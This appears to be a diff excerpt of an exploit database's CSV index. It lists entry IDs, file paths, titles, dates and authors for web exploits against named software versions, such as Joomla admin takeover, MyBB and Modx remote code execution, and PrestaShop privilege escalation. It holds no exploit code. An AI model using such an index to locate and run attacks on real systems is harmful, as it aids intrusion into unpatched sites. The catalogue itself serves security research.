25447,exploits/php/webapps/25447.txt,"Alienvault Open Source SIEM (OSSIM) 4.1.2 - Multiple SQL Injections",2013-05-14,RunRunLevel,webapps,php,
25449,exploits/php/webapps/25449.txt,"UMI CMS 2.9 - Cross-Site Request Forgery",2013-05-14,"High-Tech Bridge SA",webapps,php,
@ -37997,7 +37999,7 @@ id,file,description,date,author,type,platform,port
41150,exploits/php/webapps/41150.md,"MyBB < 1.8.3 (with PHP 5.6 < 5.6.11) - Remote Code Execution",2017-01-20,"Taoguang Chen",webapps,php,80
41155,exploits/php/webapps/41155.txt,"Movie Portal Script 7.36 - Multiple Vulnerabilities",2017-01-25,"Marc Castejon",webapps,php,
41156,exploits/php/webapps/41156.py,"Joomla! < 2.5.2 - Admin Creation",2017-01-20,"Charles Fol",webapps,php,
41157,exploits/php/webapps/41157.py,"Joomla! < 3.6.4 - Admin TakeOver",2017-01-20,"Charles Fol",webapps,php,
41157,exploits/php/webapps/41157.py,"Joomla! < 3.6.4 - Admin Takeover",2017-01-20,"Charles Fol",webapps,php,
41159,exploits/php/webapps/41159.txt,"PHP PEAR HTTP_Upload 1.0.0b3 - Arbitrary File Upload",2017-01-26,hyp3rlinx,webapps,php,
41166,exploits/php/webapps/41166.txt,"KB Affiliate Referral Script 1.0 - Authentication Bypass",2017-01-26,"Ihsan Sencan",webapps,php,
41167,exploits/php/webapps/41167.txt,"KB Login Authentication Script 1.1 - Authentication Bypass",2017-01-26,"Ihsan Sencan",webapps,php,
@ -39675,3 +39677,9 @@ id,file,description,date,author,type,platform,port
45036,exploits/hardware/webapps/45036.txt,"Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway - Configuration Download",2018-07-17,LiquidWorm,webapps,hardware,
45037,exploits/hardware/webapps/45037.txt,"Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway - File Manipulation",2018-07-17,LiquidWorm,webapps,hardware,
45038,exploits/hardware/webapps/45038.txt,"Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway - Remote Root",2018-07-17,LiquidWorm,webapps,hardware,
45046,exploits/php/webapps/45046.py,"PrestaShop < 1.6.1.19 - 'AES CBC' Privilege Escalation",2018-07-16,"Charles Fol",webapps,php,
45047,exploits/php/webapps/45047.txt,"PrestaShop < 1.6.1.19 - 'BlowFish ECD' Privilege Escalation",2018-07-16,"Charles Fol",webapps,php,
45049,exploits/php/webapps/45049.txt,"Smart SMS & Email Manager 3.3 - 'contact_type_id' SQL Injection",2018-07-18,AkkuS,webapps,php,80
45053,exploits/multiple/webapps/45053.txt,"Open-AudIT Community 2.1.1 - Cross-Site Scripting",2018-07-18,"Ranjeet Jaiswal",webapps,multiple,
45054,exploits/php/webapps/45054.txt,"FTP2FTP 1.0 - Arbitrary File Download",2018-07-18,AkkuS,webapps,php,
45055,exploits/php/webapps/45055.py,"Modx Revolution < 2.6.4 - Remote Code Execution",2018-07-18,"Vitalii Rudnykh",webapps,php,

Can't render this file because it is too large.